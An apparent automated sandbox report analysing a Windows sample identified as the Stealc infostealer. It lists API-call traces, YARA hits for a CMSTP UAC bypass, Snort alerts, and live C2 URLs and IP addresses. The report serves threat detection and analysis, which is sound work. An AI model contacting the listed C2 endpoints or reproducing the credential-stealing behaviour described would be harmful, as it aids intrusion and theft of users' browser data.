Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCD7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	1_2_6BCD7C00
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_00924280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	2_2_00924280
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_009245A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	2_2_009245A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 16.2.cmd.exe.4c74e64.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cmd.exe.4c30976.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.run.exe.3044d5b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.run.exe.300086d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.52f2264.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.421986d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.425d15b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cmd.exe.4c74264.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.run.exe.304415b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.52f2e64.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.425dd5b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.52ae976.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: run.exe PID: 6044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: run.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7440, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Unpacked PE file: 0.2.R0hb7jyBcv.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Unpacked PE file: 1.2.u5g0.0.exe.400000.0.unpack

Source: R0hb7jyBcv.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 169.150.236.98:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49761 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: u5g0.0.exe, 00000001.00000002.2101479423.000000006CB0D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb@ source: u5g0.0.exe, 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930249216.0000014801D60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977808405.000001481A5C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1866854377.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1870056905.0000000004340000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1870610192.00000000046F7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2128198720.0000000004EF4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129728205.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2099731858.0000000004250000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2100503302.0000000004704000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2099077107.000000000313E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301263248.0000000004884000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301615939.0000000004D60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: mozglue.pdb source: u5g0.0.exe, 00000001.00000002.2101479423.000000006CB0D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000002.1863624775.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1804255614.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2035551814.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2095606021.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3014494109.000001481B2E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2929673982.0000014801D20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1871536669.000000006C967000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000D.00000002.2101364592.000000006D007000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930005185.0000014801D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2929734061.0000014801D30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2929734061.0000014801D30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2929808370.0000014801D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2929808370.0000014801D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1866854377.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1870056905.0000000004340000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1870610192.00000000046F7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2128198720.0000000004EF4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129728205.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2099731858.0000000004250000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2100503302.0000000004704000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2099077107.000000000313E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301263248.0000000004884000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301615939.0000000004D60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3014582028.000001481B2F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811DEC000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb source: u5g0.0.exe, 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_0040D1C0 GetDateFormatA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_004015C0 EntryPoint,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_6C86261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	2_2_6C86261E

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user\AppData\Local\Temp\u5g0.2	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	File opened: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.4:49730 -> 185.172.128.90:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49734 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49734 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.4:49734

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.172.128.76/3cd2b41cbde8fc9c.php
Source: Malware configuration extractor	URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49770
